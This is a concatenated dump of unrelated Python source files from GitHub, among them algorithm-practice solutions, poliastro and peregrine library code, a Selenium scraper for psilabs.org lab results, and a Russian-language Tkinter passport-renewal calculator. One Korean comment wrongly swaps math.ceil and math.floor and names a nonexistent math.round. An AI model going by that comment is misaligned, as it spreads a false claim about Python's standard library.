main()\n","repo_name":"SmartHypercube/Markdown2LaTeX","sub_path":"md2LaTeX.py","file_name":"md2LaTeX.py","file_ext":"py","file_size_in_byte":5523,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"21"} +{"seq_id":"5966299344","text":"# https://programmers.co.kr/learn/courses/30/lessons/42586\r\n\r\n# math.ceil 은 내림, math.floor는 올림, math.round는 반올림\r\n\r\nimport math\r\n\r\ndef solution(progresses, speeds):\r\n answer = []\r\n left = []\r\n total = len(progresses)\r\n\r\n for i in range(total):\r\n left.append(math.ceil((100-progresses[i])/speeds[i]))\r\n\r\n num = 1\r\n last = left[0]\r\n if total >= 1:\r\n if total == 1:\r\n answer.append(num)\r\n return answer\r\n for i in range(1, total):\r\n if i == total - 1:\r\n if last < left[i]:\r\n answer.append(num)\r\n num = 1\r\n else:\r\n num += 1\r\n answer.append(num)\r\n elif last < left[i]:\r\n answer.append(num)\r\n last = left[i]\r\n num = 1\r\n else:\r\n num += 1\r\n \r\n return answer","repo_name":"kylew1004/algorithm","sub_path":"Programmers/코딩테스트 고득점 kit/스택_큐/기능개발.py","file_name":"기능개발.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7721863282","text":"from astropy import units as u\n\nfrom poliastro.core.flybys import compute_flyby as compute_flyby_fast\n\n\n@u.quantity_input(\n v_spacecraft=u.km / u.s,\n v_body=u.km / u.s,\n k=u.km**3 / u.s**2,\n r_p=u.km,\n theta=u.deg,\n)\ndef compute_flyby(v_spacecraft, v_body, k, r_p, theta=0 * u.deg):\n \"\"\"Computes outbound velocity after a flyby.\n\n Parameters\n ----------\n v_spacecraft : ~astropy.units.Quantity\n Velocity of the spacecraft, relative to the attractor of the body.\n v_body : ~astropy.units.Quantity\n Velocity of the body, relative to its attractor.\n k : ~astropy.units.Quantity\n Standard gravitational parameter of the body.\n r_p : ~astropy.units.Quantity\n Radius of periapsis, measured from the center of the body.\n theta : ~astropy.units.Quantity, optional\n Aim angle of the B vector, default to 0.\n\n Returns\n -------\n v_spacecraft_out : ~astropy.units.Quantity\n Outbound velocity of the spacecraft.\n delta : ~astropy.units.Quantity\n Turn angle.\n\n \"\"\"\n v_spacecraft = v_spacecraft.to_value(u.km / u.s)\n v_body = v_body.to_value(u.km / u.s)\n k = k.to_value(u.km**3 / u.s**2)\n r_p = r_p.to_value(u.km)\n theta = theta.to_value(u.rad)\n\n v_spacecraft_out, delta = compute_flyby_fast(\n v_spacecraft, v_body, k, r_p, theta\n )\n\n return v_spacecraft_out * u.km / u.s, delta * u.rad\n","repo_name":"poliastro/poliastro","sub_path":"src/poliastro/threebody/flybys.py","file_name":"flybys.py","file_ext":"py","file_size_in_byte":1406,"program_lang":"python","lang":"en","doc_type":"code","stars":806,"dataset":"github-code","pt":"21"} +{"seq_id":"32850175577","text":"import numpy as np\n\n\ndef correction(p, n=1e6):\n \"\"\"LaPlace correction\n \"\"\"\n return (p*n+1) / (n*p.shape[1])\n\n\ndef odds(p):\n p = correction(p)\n return p / (1-p)\n\n\ndef WE(preds, conds):\n \"\"\"Weighted evidence\n measured in bits\n \"\"\"\n return np.log2(odds(preds)) - np.log2(odds(conds))\n\n\nif __name__ == '__main__':\n from argparse import ArgumentParser\n from featuresharing import dataio\n from tqdm import tqdm\n import os\n\n parser = ArgumentParser()\n parser.add_argument('--datadir', type=str, required=True, help='Path to data. Automatically looks for files:\\n'\n 'data-predictions.npz, data-targets.npz')\n parser.add_argument('--layers', type=str, required=True, nargs='+',\n help='Layers to process. Automatically looks for files that match:\\n'\n 'data-conditionals_layer=[layer].npz')\n parser.add_argument('--method', type=str, required=True,\n help='Legal values: we, probdiff, infdiff')\n\n args = parser.parse_args()\n\n # ------------------------------------------------------------------------------------------------------------------\n # Evaluate arguments\n\n methods = {\n 'we': WE,\n 'probdiff': lambda px, py: px-py,\n 'infdiff': lambda px, py: np.log2(px) - np.log2(py),\n }\n\n if args.method.lower() not in methods:\n parser.error('Illegal method %s' % args.method)\n\n method = methods[args.method.lower()]\n\n # ------------------------------------------------------------------------------------------------------------------\n # Load data\n\n predictions, _ = dataio.loadnpz(os.path.join(args.datadir, 'data-predictions.npz'))\n\n # ------------------------------------------------------------------------------------------------------------------\n # Read and evaluate conditionals\n\n for layer in tqdm(args.layers):\n conditionals, keys = dataio.loadnpz(os.path.join(args.datadir, 'data-conditionals_layer=%s.npz' % layer))\n\n evidence = {}\n for i, key in enumerate(keys):\n evidence[key] = np.zeros(conditionals[i].shape)\n\n for unitidx in range(conditionals[i].shape[0]):\n evidence[key][unitidx, :] = method(predictions[i], conditionals[i][unitidx])\n\n np.savez(os.path.join(args.datadir, 'data-featurecontribution_layer=%s.npz' % layer), **evidence)\n\n print('Done')\n","repo_name":"mlosch/FeatureSharing","sub_path":"featuresharing/analysis/featurecontribution.py","file_name":"featurecontribution.py","file_ext":"py","file_size_in_byte":2479,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"33775317596","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nperegrine.resources.submission.graphql.util\n----------------------------------------\n\nDefines utility functions for GraphQL implementation.\n\"\"\"\n\nfrom flask import current_app as capp\nfrom flask import g as fg\nfrom . import node\nfrom datamodelutils import models\n\nfrom graphql.utils.ast_to_dict import ast_to_dict\nimport sqlalchemy as sa\nfrom sqlalchemy.orm import load_only\n\nimport psqlgraph\n\n# from peregrine.resources.submission.constants import (\n# FILTER_ACTIVE,\n# )\n\nDEFAULT_LIMIT = 10\n\n\ndef set_session_timeout(session, timeout):\n session.execute(\n \"SET LOCAL statement_timeout = {}\".format(int(float(timeout) * 1000))\n )\n\n\ndef get_column_names(entity):\n \"\"\"Returns an iterable of column names the entity has\"\"\"\n if hasattr(entity, \"__pg_properties__\"):\n return (k for k in entity.__pg_properties__)\n\n return (c.name for c in entity.__table__.columns)\n\n\ndef column_dict(row, skip=set()):\n \"\"\"Returns a dict with all columns except those in :param:`skip`\"\"\"\n\n return {\n column: getattr(row, column)\n for column in get_column_names(row)\n if column not in skip\n }\n\n\ndef filtered_column_dict(row, info, fields_depend_on_columns=None):\n \"\"\"Returns a dict with only columns required for query\"\"\"\n\n columns = get_loaded_columns(row, info, fields_depend_on_columns)\n\n return {column: getattr(row, column) for column in columns}\n\n\ndef get_active_project_ids():\n return [\n \"{}-{}\".format(project.programs[0].name, project.code)\n for project in capp.db.nodes(Project)\n .filter(models.Project._props[\"state\"].astext != \"closed\")\n .filter(models.Project._props[\"state\"].astext != \"legacy\")\n .all()\n ]\n\n\ndef active_project_filter(q):\n \"\"\"Takes a query and applies a filter to select only nodes that have a\n ``project_id`` relating to an active project.\n\n :param q: a SQLAlchemy ``Query`` object\n :returns: the filtered ``Query`` object\n\n ..note::\n\n For security reasons, if the selected query entity is a\n :class:`psqlgraph.Node` object, apply the filter on project\n id. This removes things that do not have a ``project_id`` from\n the results. TODO: make allow result types that do not have\n ``project_id`` while maintaining filter correctness.\n\n\n \"\"\"\n\n cls = q.entity()\n\n if cls.label == \"project\":\n return q.filter(models.Project._props[\"state\"].astext != \"closed\").filter(\n models.Project._props[\"state\"].astext != \"legacy\"\n )\n\n fg.active_project_ids = fg.get(\"active_project_ids\") or get_active_project_ids()\n if cls == psqlgraph.Node or hasattr(cls, \"project_id\"):\n project_id_attr = cls._props[\"project_id\"].astext\n q = q.filter(project_id_attr.in_(fg.active_project_ids))\n\n return q\n\n\ndef authorization_filter(q):\n \"\"\"Takes a query and applies a filter to select only nodes that the\n current request user has access to based on ``project_id``.\n\n :param q: a SQLAlchemy ``Query`` object\n :returns: the filtered ``Query`` object\n\n ..note::\n\n For security reasons, if the selected query entity is a\n :class:`psqlgraph.Node` object, apply the filter on project\n id. This removes things that do not have a ``project_id`` from\n the results. TODO: make allow result types that do not have\n ``project_id`` while maintaining filter correctness.\n\n \"\"\"\n\n cls = q.entity()\n\n if cls == psqlgraph.Node or hasattr(cls, \"project_id\"):\n q = q.filter(cls._props[\"project_id\"].astext.in_(fg.read_access_projects))\n\n if cls.label == \"project\":\n # do not return unauthorized projects\n q = node.filter_project_project_id(q, fg.read_access_projects, None)\n\n # if FILTER_ACTIVE:\n # q = active_project_filter(q)\n\n return q\n\n\ndef get_authorized_query(cls):\n return authorization_filter(capp.db.nodes(cls))\n\n\ndef apply_arg_limit(q, args, info):\n limit = args.get(\"first\", DEFAULT_LIMIT)\n if limit > 0:\n q = q.limit(limit)\n return q\n\n\ndef apply_arg_offset(q, args, info):\n offset = args.get(\"offset\", 0)\n if offset > 0:\n q = q.offset(offset)\n return q\n\n\ndef get_loaded_columns(entity, info, fields_depend_on_columns=None):\n \"\"\"Returns a set of columns loaded from database\n because some fields depend on columns of a different name,\n :param:`depends_on` is there to map to the so we know to load them\n \"\"\"\n\n fields = set(get_fields(info))\n\n if fields_depend_on_columns:\n fields.update(\n {\n column\n for field in fields\n for column in fields_depend_on_columns.get(field, {})\n }\n )\n\n all_columns = set(get_column_names(entity))\n used_columns = fields.intersection(all_columns)\n\n return used_columns\n\n\ndef apply_load_only(query, info, fields_depend_on_columns=None):\n \"\"\"Returns optimized q by selecting only the necessary columns\"\"\"\n\n # if the entity doesn't have a backing table then don't do this\n # this happens when using the generic node property\n if not hasattr(query.entity(), \"__table__\"):\n return query\n\n columns = get_loaded_columns(query.entity(), info, fields_depend_on_columns)\n\n return query.options(load_only(*columns))\n\n\n# The below is lifted from\n# https://gist.github.com/mixxorz/dc36e180d1888629cf33\n\n\ndef collect_fields(node, fragments):\n \"\"\"Recursively collects fields from the AST\n Args:\n node (dict): A node in the AST\n fragments (dict): Fragment definitions\n Returns:\n A dict mapping each field found, along with their sub fields.\n {'name': {},\n 'sentimentsPerLanguage': {'id': {},\n 'name': {},\n 'totalSentiments': {}},\n 'slug': {}}\n \"\"\"\n\n field = {}\n\n if node.get(\"selection_set\"):\n for leaf in node[\"selection_set\"][\"selections\"]:\n if leaf[\"kind\"] == \"Field\":\n field.update({leaf[\"name\"][\"value\"]: collect_fields(leaf, fragments)})\n elif leaf[\"kind\"] == \"FragmentSpread\":\n field.update(\n collect_fields(fragments[leaf[\"name\"][\"value\"]], fragments)\n )\n\n return field\n\n\ndef get_fields(info):\n \"\"\"A convenience function to call collect_fields with info\n Args:\n info (ResolveInfo)\n Returns:\n dict: Returned from collect_fields\n \"\"\"\n\n fragments = {}\n node = ast_to_dict(info.field_asts[0])\n\n for name, value in info.fragments.items():\n fragments[name] = ast_to_dict(value)\n\n return collect_fields(node, fragments)\n\n\ndef clean_count(q):\n \"\"\"Returns the count from this query without pulling all the columns\n\n This gets the count from a query without doing a subquery\n The subquery would pull all the information from the DB\n and cause statement timeouts with large numbers of rows.\n\n Args:\n q (psqlgraph.query.GraphQuery): The current query object.\n\n \"\"\"\n query_count = (\n q.options(sa.orm.lazyload(\"*\"))\n .statement.with_only_columns([sa.func.count()])\n .order_by(None)\n )\n return q.session.execute(query_count).scalar()\n","repo_name":"uc-cdis/peregrine","sub_path":"peregrine/resources/submission/graphql/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":7253,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"21"} +{"seq_id":"18239335493","text":"#!/usr/bin/env python3\n# coding: utf-8\n\nfrom selenium import webdriver\nfrom selenium.webdriver.support import expected_conditions as selenium_webdriver_support_expectedConditions\nfrom selenium.common.exceptions import TimeoutException as selenium_common_exceptions_TimeoutException\nfrom selenium.common.exceptions import ElementNotInteractableException as selenium_common_exceptions_ElementNotInteractableException\nfrom selenium.common.exceptions import ElementClickInterceptedException as selenium_common_exceptions_ElementClickInterceptedException\nimport argparse, time, os, re, csv, urllib, datetime\n\nparser = argparse.ArgumentParser(argument_default=False, description='Download raw lab data.')\nparser.add_argument('--verbose', '-v', action='count', default=0, help='Turn on verbose mode.')\nparser.add_argument('--force-redownload', action='store_true', help='Downloads pages even if they already exist. Will not overwrite existing page.')\nparser.add_argument('--check-newest', type=int, action='store', nargs='?', const=10, help='Sorts by \"Desc\". Stops when first 10 existing samples are encountered.')\nparser.add_argument('-p', '--profile', default='../browser_profiles/firefox', help='Path to a valid Firefox profile if you wanna use a specially prepared profile.')\nparser.add_argument('--wait-after-newtab', default=0, type=int, help='Whether to wait after a new tab is opened and for how many seconds.')\nparser.add_argument('--newtab-url', default='about:blank', help='What page should be initially loaded when a new tab is opened.')\nparser.add_argument('-s', '--save-path', default='database_dump/', help='In which folder to save the downloaded pages.')\nargs = parser.parse_args()\n\ndef log_this(msg, verbosity=3, override=False):\n\tif verbosity <= args.verbose or override:\n\t\tif verbosity == 1:\n\t\t\tprint('INFO {}'.format(msg))\n\t\telif verbosity == 2:\n\t\t\tprint('DETAIL {}'.format(msg))\n\t\telif verbosity == 3:\n\t\t\tprint('DEBUG {}'.format(msg))\n\nlog_this('loading configs', 1)\n\ndef open_newtab(url=args.newtab_url, delay=0.05, max_tries=100):\n\tglobal browser\n\t'''Returns the window handle of the new tab.'''\n\twindows_before = set(browser.window_handles)\n\tbrowser.execute_script('window.open(\"{}\", \"_blank\");'.format(url))\n\tfor i in range(max_tries):\n\t\tnew_handles = windows_before ^ set(browser.window_handles)\n\t\tif len(new_handles) == 0:\n\t\t\ttime.sleep(delay)\n\t\telse:\n\t\t\treturn new_handles.pop()\n\ndef wait_for_element(xpath, timeout=600):\n\tglobal browser\n\ttry:\n\t\tselection = webdriver.support.ui.WebDriverWait(browser, timeout).until(\n\t\t\tselenium_webdriver_support_expectedConditions.presence_of_all_elements_located(\n\t\t\t\t(webdriver.common.by.By.XPATH,xpath)\n\t\t\t)\n\t\t)\n\texcept:\n\t\treturn False\n\treturn selection\n\ndef select_dropdown_option(dropdown_id, option_selector, fallback_text, verification_selector, timeout=60):\n\tglobal browser\n\tdropdown = browser.find_element_by_id(dropdown_id)\n\ttry:\n\t\tif type(dropdown) == webdriver.firefox.webelement.FirefoxWebElement:\n\t\t\tdropdown.click()\n\t\t\tdropdown_option = browser.find_element_by_xpath(option_selector)\n\t\t\tif type(dropdown_option) == webdriver.firefox.webelement.FirefoxWebElement:\n\t\t\t\tdropdown_option.click()\n\t\t\telse:\n\t\t\t\tinput(fallback_text)\n\texcept (selenium_common_exceptions_ElementNotInteractableException, selenium_common_exceptions_ElementClickInterceptedException) as e:\n\t\tinput(fallback_text)\n\tverification_element = wait_for_element(verification_selector, timeout)\n\tif verification_element:\n\t\treturn True\n\telse:\n\t\treturn False\n\ndef select_checkbox(checkbox_selector, fallback_text, verification_selector, timeout=60):\n\tglobal browser\n\tcheckbox = browser.find_element_by_xpath(checkbox_selector)\n\ttry:\n\t\tif type(checkbox) == webdriver.firefox.webelement.FirefoxWebElement:\n\t\t\tcheckbox.click()\n\t\telse:\n\t\t\tinput(fallback_text)\n\texcept (selenium_common_exceptions_ElementNotInteractableException, selenium_common_exceptions_ElementClickInterceptedException) as e:\n\t\tinput(fallback_text)\n\tverification_element = wait_for_element(verification_selector, timeout)\n\tif verification_element:\n\t\treturn True\n\telse:\n\t\treturn False\n\ndef write_to_csv(filepath, fieldnames, data):\n\tif os.path.exists(filepath):\n\t\twriteheader = False\n\telse:\n\t\twriteheader = True\n\twith open(filepath, 'a', encoding='utf-8') as writefile:\n\t\twritefile_writer = csv.DictWriter(writefile, fieldnames=fieldnames, lineterminator='\\n')\n\t\tif writeheader:\n\t\t\twritefile_writer.writeheader()\n\t\twritefile_writer.writerow(data)\n\nURL_sample_result = 'https://psilabs.org/results/test-results/show/'\ncounter = 1\nos.makedirs(args.save_path, exist_ok=True)\n\nslug = ''\nencountered_known_samples = 0\ntry:\n\toptions = webdriver.FirefoxOptions()\n\tif args.profile:\n\t\tprofile = webdriver.FirefoxProfile(profile_directory=args.profile)\n\t\toptions._profile = profile\n\toptions.set_preference('browser.link.open_newwindow',3)\n\toptions.set_preference('browser.link.open_newwindow.override.external',3)\n\toptions.set_preference('browser.link.open_newwindow.restriction',0)\n\tlog_this('starting browser', 1)\n\tif args.profile:\n\t\tbrowser=webdriver.Firefox(firefox_profile=profile, options=options)\n\telse:\n\t\tbrowser=webdriver.Firefox(options=options)\n\n\tbrowser.get('https://psilabs.org/results/test-results/?page=1')\n\tresults_list_loaded = wait_for_element(\n\t\t'//sample-card/md-card/md-card-title/md-card-title-text/span/a'\n\t)\n\tif not results_list_loaded:\n\t\texit('Could not load initial list.')\n\tcurrent_page = '0'\n\n\t# the following selectors (those with the numbers) are very likely to break soon\n\tselect_dropdown_option(\n\t\t'select_49',\n\t\t'//md-option[@value=\"dateTested\"][div[text()=\"Date Tested\"]]',\n\t\t'In the \"Filter\" pane please click on \"Sort By\" > \"Date Tested\". If you are done, press enter here to continue.',\n\t\t'//sample-card/md-card/md-card-title/md-card-title-text/span/a'\n\t)\n\n\tif args.check_newest:\n\t\tselect_dropdown_option(\n\t\t\t'select_53', #//md-input-container/md-select[md-select-value/span/div[starts-with(\"Desc\")]]\n\t\t\t'//md-option[@value=\"desc\"][div[text()=\"Desc\"]]',\n\t\t\t'In the \"Filter\" pane please click on \"Direction\" > \"Desc\". If you are done, press enter here to continue.',\n\t\t\t'//sample-card/md-card/md-card-title/md-card-title-text/span/a'\n\t\t)\n\telse:\n\t\tselect_dropdown_option(\n\t\t\t'select_53', #//md-input-container/md-select[md-select-value/span/div[starts-with(\"Asc\")]]\n\t\t\t'//md-option[@value=\"asc\"][div[text()=\"Asc\"]]',\n\t\t\t'In the \"Filter\" pane please click on \"Direction\" > \"Asc\". If you are done, press enter here to continue.',\n\t\t\t'//sample-card/md-card/md-card-title/md-card-title-text/span/a'\n\t\t)\n\n\tselect_checkbox(\n\t\t'//md-checkbox[@aria-label=\"Terpene Profile\"]',\n\t\t'In the \"Filter\" pane please click on \"TESTS INCLUDED\" > \"Terpene Profile\". If you are done, press enter here to continue.',\n\t\t'//sample-card/md-card/md-card-title/md-card-title-text/span/a'\n\t)\n\n\ttab_results_list = browser.window_handles[0]\n\tbrowser.switch_to.window(tab_results_list)\n\n\tlog_this('starting loop', 1)\n\twhile True:\n\t\traw_search_results = wait_for_element(\n\t\t\t'//sample-card/md-card/md-card-title/md-card-title-text/span/a'\n\t\t)\n\n\t\tprevious_page = current_page\n\t\tcurrent_url = urllib.parse.urlparse(browser.current_url)\n\t\tcurrent_page = urllib.parse.parse_qs(current_url.query)['page'][0]\n\n\t\tif raw_search_results:\n\t\t\tif current_page == previous_page:\n\t\t\t\tlog_this('Reached last page!', 1)\n\t\t\t\tbreak\n\t\telse:\n\t\t\tlog_this('Could not retrieve results page {}'.format(current_page), 1)\n\t\t\twrite_to_csv(os.path.join(args.save_path, 'failed_result_pages.csv'), ['Page URL'], {'Page URL':current_page})\n\t\t\tcontinue\n\n\t\tsample_urls = []\n\t\tfor search_result_element in raw_search_results:\n\t\t\tsearch_result_url = search_result_element.get_attribute('href')\n\t\t\tif search_result_url.startswith('https://psilabs.org/results/clients'):\n\t\t\t\tcontinue\n\t\t\tsample_urls.append(search_result_url)\n\t\tfor sample_url in sample_urls:\n\t\t\tif sample_url.startswith(URL_sample_result):\n\t\t\t\tslug = sample_url[len(URL_sample_result):]\n\t\t\telse:\n\t\t\t\twrite_to_csv(os.path.join(args.save_path, 'link_not_sample_or_provider.csv'), ['URL'], {'URL':sample_url})\n\t\t\tslug = re.sub(r'[^0-9A-Za-z]', '', slug)\n\t\t\tlog_this('Getting Sample {}'.format(sample_url), 1)\n\t\t\tif args.check_newest and os.path.exists(os.path.join(args.save_path, '{}.html'.format(slug))):\n\t\t\t\tencountered_known_samples += 1\n\t\t\t\tlog_this('Found existing sample {}'.format(slug), 1)\n\t\t\t\tif encountered_known_samples >= args.check_newest:\n\t\t\t\t\tbrowser.quit()\n\t\t\t\t\texit('Quitting')\n\t\t\tif not args.force_redownload and os.path.exists(os.path.join(args.save_path, '{}.html'.format(slug))):\n\t\t\t\tlog_this('Already exists: skipping.', 1)\n\t\t\t\tcontinue\n\t\t\ttab_result_page = open_newtab()\n\t\t\tbrowser.switch_to.window(tab_result_page)\n\t\t\ttime.sleep(args.wait_after_newtab)\n\t\t\tbrowser.get(sample_url)\n\t\t\t# SECOND TAB\n\t\t\tif len(wait_for_element('//md-content/div/md-card/md-card-header/md-card-header-text/span[@class=\"md-title\"][not(text()=\"\")]'))>1:\n\t\t\t\ttime.sleep(0.5)\n\t\t\telse:\n\t\t\t\tlog_this('Could not save sample {}'.format(sample_url), 1)\n\t\t\t\twrite_to_csv(os.path.join(args.save_path, 'failed_samples.csv'), ['Sample URL'], {'Sample URL':sample_url})\n\t\t\t\tcontinue\n\t\t\tfilename = os.path.join(args.save_path, '{}.html'.format(slug))\n\t\t\tcounter = 1\n\t\t\twhile os.path.exists(filename):\n\t\t\t\tcounter += 1\n\t\t\t\tfilename = os.path.join(args.save_path,'{}_{}.html'.format(slug, counter))\n\t\t\twith open(filename, 'w', encoding='utf-8') as sample_file:\n\t\t\t\tsample_file.write(browser.page_source)\n\t\t\tlog_this('Saved to file {}'.format(filename), 1)\n\t\t\t# SECOND TAB END\n\t\t\tbrowser.close()\n\t\t\tbrowser.switch_to.window(tab_results_list)\n\t\tlog_this('getting next results page', 1)\n\t\tbutton_next = browser.find_element_by_xpath('//page-selector/ul/li/button[md-icon[text()=\"chevron_right\"]]')\n\t\tbutton_next.click()\n\tbrowser.quit()\n\tlog_this('Finished!', 1, True)\nexcept KeyboardInterrupt as e:\n\tbrowser.quit()\n\texit('Last sample was {}'.format(slug))\n","repo_name":"Build-Week-MedCabinet/DS_Model_Engineering","sub_path":"Wrangling/web_scrapers/psilabs/downloader.py","file_name":"downloader.py","file_ext":"py","file_size_in_byte":9856,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"36800139293","text":"import heapq # 堆排序模块 q->queue 优先队列\nimport random\n\nli = list(range(10))\nrandom.shuffle(li) # 将列表打乱顺序\n\n# 建小根堆\nheapq.heapify(li)\n# print(li)\n\n# heappop 每次取堆的最小值\nn = len(li)\nfor i in range(n):\n print(heapq.heappop(li), end=\"\")\n","repo_name":"diaoyuqiang/python","sub_path":"算法/堆排序模块.py","file_name":"堆排序模块.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22469400835","text":"'''\n合并k个排序链表,并且返回合并后的排序链表。尝试分析和描述其复杂度。\n\n样例\n给出3个排序链表[2->4->null,null,-1->null],返回 -1->2->4->null\n'''\n\"\"\"\nDefinition of ListNode\nclass ListNode(object):\n\n def __init__(self, val, next=None):\n self.val = val\n self.next = next\n\"\"\"\n# Methode1\nimport heapq\nclass Solution(object):\n def mergeKLists(self, lists):\n \"\"\"\n :type lists: List[ListNode]\n :rtype: ListNode\n \"\"\"\n heap = []\n for node in lists:\n while node:\n heapq.heappush(heap, node.val)\n node = node.next\n \n temp = ListNode(-1)\n head = temp\n while heap:\n smallestNode_val = heapq.heappop(heap)\n temp.next = ListNode(smallestNode_val)\n temp = temp.next\n \n return head.next\n \n\n# Methode2\nclass Solution(object):\n def mergeKLists(self, lists):\n \"\"\"\n :type lists: List[ListNode]\n :rtype: ListNode\n \"\"\"\n l = []\n for node in lists:\n while node:\n l.append(node.val)\n node = node.next\n l.sort()\n temp = ListNode(-1)\n head = temp\n for i in l:\n temp.next = ListNode(i)\n temp = temp.next\n \n return head.next","repo_name":"MUSK1881/lintcode-by-python","sub_path":"中等/104. Merge K Sorted Lists.py","file_name":"104. Merge K Sorted Lists.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"16502456376","text":"import re\nfrom datetime import datetime\nfrom tkinter import *\n\nfrom tkcalendar import DateEntry\n\nwindow = Tk()\nwindow.title(\"Когда менять паспорт\")\nwindow.geometry('380x550+760+250')\n\nlbl_description = Label(window,\n text=\"Данная программа поможет Вам рассчитать через какой промежуток времени Вам нужно поменять паспорт\",\n wraplength=390, justify=CENTER, padx=10, pady=10)\nlbl_input = Label(window, text=\"Для этого Вам необходимо ввести свои ФИО и дату рождения\", wraplength=390,\n justify=CENTER, padx=10, pady=10)\n\nlbl_name = Label(window, text=\"ФИО: \", wraplength=400)\n\n\ndef validate_username(username):\n result = re.match(\"[а-яА-ЯёЁ ]+$\", username) is not None\n if not result and len(username) <= 50:\n errmsg_name.set(\"Используйте только кириллицу\")\n else:\n errmsg_name.set(\"\")\n return result\n\n# def\ndef your_age(d_a, m_a, y_a, d_n, m_n, y_n):\n day_num_cal, month_num_cal, year_num_cal, now_day, now_month, now_year = d_a, m_a, y_a, d_n, m_n, y_n\n if now_month == month_num_cal:\n if now_day > day_num_cal:\n age = now_year - year_num_cal\n return age\n else:\n age = now_year - year_num_cal - 1\n return age\n elif now_month > month_num_cal:\n age = now_year - year_num_cal\n return age\n else:\n age = now_year - year_num_cal - 1\n return age\n\n\ndef after_replace(d_a, m_a, d_n, m_n):\n days_num = str(datetime(day=d_n, month=m_n, year=2022) - datetime(day=d_a, month=m_a, year=2022))\n days = days_num.split()[0]\n if days == \"0:00:00\":\n days = 0\n elif int(days) < 0:\n days = 365 + int(days)\n return days\n\n\ndef before_replace(d_a, m_a, y_a, d_n, m_n, your_ages):\n days_num = str(datetime(day=d_a, month=m_a, year=2022) - datetime(day=d_n, month=m_n, year=2022))\n days = days_num.split()[0]\n if days == \"0:00:00\":\n days = 0\n elif int(days) < 0:\n days = 365 + int(days)\n return days\n\n\ndef test1():\n global output\n fio_str = entry_name.get()\n fio = fio_str.split()\n if fio_str == \"\":\n errmsg_name.set(\"Введите ФИО\")\n elif len(fio) == 3:\n date2 = cal.get()\n month_num_cal = int(date2.split(\"/\")[0])\n day_num_cal = int(date2.split(\"/\")[1])\n if int(date2.split(\"/\")[2]) > 22:\n year_num_cal = int(\"19\" + date2.split(\"/\")[2])\n else:\n year_num_cal = int(\"20\" + date2.split(\"/\")[2])\n\n now = datetime.now()\n now_day = int(str(now).split()[0].split(\"-\")[2])\n now_month = int(str(now).split()[0].split(\"-\")[1])\n now_year = int(str(now).split()[0].split(\"-\")[0])\n old = datetime(day=day_num_cal, month=month_num_cal, year=year_num_cal)\n\n timedelta = now - old\n\n initials = str(fio[0].title()) + \" \" + str(fio[1][0].upper()) + \". \" + str(fio[2][0].upper())\n\n\n if timedelta.days <= 0:\n errmsg_date.set(\"Введите корректную дату\")\n else:\n errmsg_date.set(\"\")\n your_ages = your_age(day_num_cal, month_num_cal, year_num_cal, now_day, now_month, now_year)\n if your_ages > 45:\n output.set(\"Здравствуйте, \" + str(initials) + \". Вам больше не нужно менять паспорт.\")\n elif 18 < your_ages < 21:\n if your_ages >= 20:\n after = after_replace(day_num_cal, month_num_cal, now_day, now_month)\n if int(after) == 0:\n output.set(\"Здравствуйте, \" + str(initials) + \". До срока замены паспорта более года. На данный момент вам не стоит беспокоиться по этому поводу.\")\n elif int(after) <= 90:\n count = - (int(after) - 90)\n output.set(\"Здравствуйте, \" + str(initials) + \". На данный момент вам \" + str(your_ages) + \" лет. \" + \"Если вы до сих пор не поменяли паспорт, сделайте это в ближайшем МФЦ. У Вас осталось \" + str(count) + \" дней на замену. Если вы не поменяете паспорт в течении этого времени, на Вас будет наложен штраф.\")\n else:\n count = int(after) - 90\n output.set(\"Здравствуйте, \" + str(initials) + \". На данный момент вам \" + str(your_ages) + \" лет. \" + \"Если вы до сих пор не поменяли паспорт, сделайте это в ближайшем МФЦ. У вас просрочка в \" + str(count) + \" дней. Не забудьте оплатить штраф.\")\n\n else:\n before = before_replace(day_num_cal, month_num_cal, year_num_cal, now_day, now_month, your_ages)\n if before == 0:\n output.set(\"С днём рождения, \" + str(initials) + \"! На данный момент вам \" + str(your_ages + 1) + \" лет. \" + \"Поменяйте паспорт в течении следующих 90 дней.\")\n else:\n output.set(\"Здравствуйте, \" + str(initials) + \". На данный момент вам \" + str(your_ages) + \" лет. \" + \"До замены паспорта осталось \" + str(before) + \" дней.\")\n\n elif 43 < your_ages < 46:\n if your_ages >= 45:\n after = after_replace(day_num_cal, month_num_cal, now_day, now_month)\n if int(after) == 0:\n output.set(\"Здравствуйте, \" + str(initials) + \". До срока замены паспорта более года. На данный момент вам не стоит беспокоиться по этому поводу.\")\n elif int(after) <= 90:\n count = - (int(after) - 90)\n output.set(\"Здравствуйте, \" + str(initials) + \". На данный момент вам \" + str(your_ages) + \" лет. \" + \"Если вы до сих пор не поменяли паспорт, сделайте это в ближайшем МФЦ. У Вас осталось \" + str(count) + \" дней на замену. Если вы не поменяете паспорт в течении этого времени, на Вас будет наложен штраф.\")\n else:\n count = int(after) - 90\n output.set(\"Здравствуйте, \" + str(initials) + \". На данный момент вам \" + str(your_ages) + \" лет. \" + \"Если вы до сих пор не поменяли паспорт, сделайте это в ближайшем МФЦ. У вас просрочка в \" + str(count) + \" дней. Не забудьте оплатить штраф.\")\n\n else:\n before = before_replace(day_num_cal, month_num_cal, year_num_cal, now_day, now_month, your_ages)\n if before == 0:\n output.set(\"С днём рождения, \" + str(initials) + \"! На данный момент вам \" + str(\n your_ages + 1) + \" лет. \" + \"Поменяйте паспорт в течении следующих 90 дней.\")\n else:\n output.set(\"Здравствуйте, \" + str(initials) + \". На данный момент вам \" + str(\n your_ages) + \" лет. \" + \"До замены паспорта осталось \" + str(before) + \" дней.\")\n else:\n output.set(\"Здравствуйте, \" + str(\n initials) + \". До срока замены паспорта более года. На данный момент вам не стоит беспокоиться по этому поводу.\")\n\n\n\n else:\n errmsg_name.set(\"Некорректные данные\")\n\ncheck = 